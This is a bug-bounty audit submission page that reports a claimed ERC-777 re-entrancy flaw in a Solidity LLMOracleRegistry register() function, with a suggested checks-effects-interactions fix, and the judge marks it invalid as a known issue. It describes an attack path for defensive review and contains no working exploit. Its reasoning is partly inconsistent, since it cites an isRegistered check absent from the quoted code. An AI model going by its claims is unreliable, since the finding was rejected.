Dria

Swan

NFTHardhat

21,000 USDC

View results

Previous Next

Submission Details

Severity: medium

Invalid

Re-entrancy in `LLMOracleRegistry::register()`function.

aye__aye

Summary

In the docmentation, the Protocol says that they accept tokens that are compatible with ERC20 token standard.

However, token like `ERC-777` are backward compatible with ERC-20 tokens,if an attacker calls the `register()` function,the attacker can maliciously use the hook `tokensToSend` in the `ERC777` before transfering the token and can call the `register()` function multiple times.

Vulnerability Details

```javascript

function register(LLMOracleKind kind) public {

token.transferFrom(msg.sender, address(this), amount);

// register the user

=> registrations[msg.sender][kind] = amount;

=> emit Registered(msg.sender, kind);

}

```

Impact

The attacker could register multiple times for the same LLMOracleKind by recursively re-entering the register function, bypassing the isRegistered check. This could lead to Inaccurate registration data and significant distortion in the staking amounts.

A loop of re-entrant calls may increase gas consumption significantly, potentially exhausting the contract’s gas limit. This could disrupt the protocol's operation and lead to denial of service (DoS) for other users.

reentrant calls could generate multiple events and could seriously affect other system that are relying on these events.

Tools Used

manual review , slither

Recommendations

Consider applying the nonReentrant modifier from OpenZeppelin's ReentrancyGuard to prevent recursive function calls.
follow CEI.

openzeppelin ```diff

function register(LLMOracleKind kind) public {

+ registrations[msg.sender][kind] = amount;

+ emit Registered(msg.sender, kind);

token.transferFrom(msg.sender, address(this), amount);

- registrations[msg.sender][kind] = amount;

- emit Registered(msg.sender, kind);

}

```

Updates

Lead Judging Commences

inallhonesty Lead Judge 8 months ago

Submission Judgement Published

Invalidated

Reason: Known issue

Prize pool breakdown

Total prize

21,000 USDC

nSLOC

1,034

20 USDC / LOC

High Medium

20,000 USDC

Low

1,000 USDC

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being carefully reviewed by our judges.

View all submissions

Appeals

This is your time to appeal against judgements on your submissions.

Appeals Review

Appeals are being carefully reviewed by our judges.

Rewards Distribution

The contest is complete and the rewards are being distributed.

View results

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.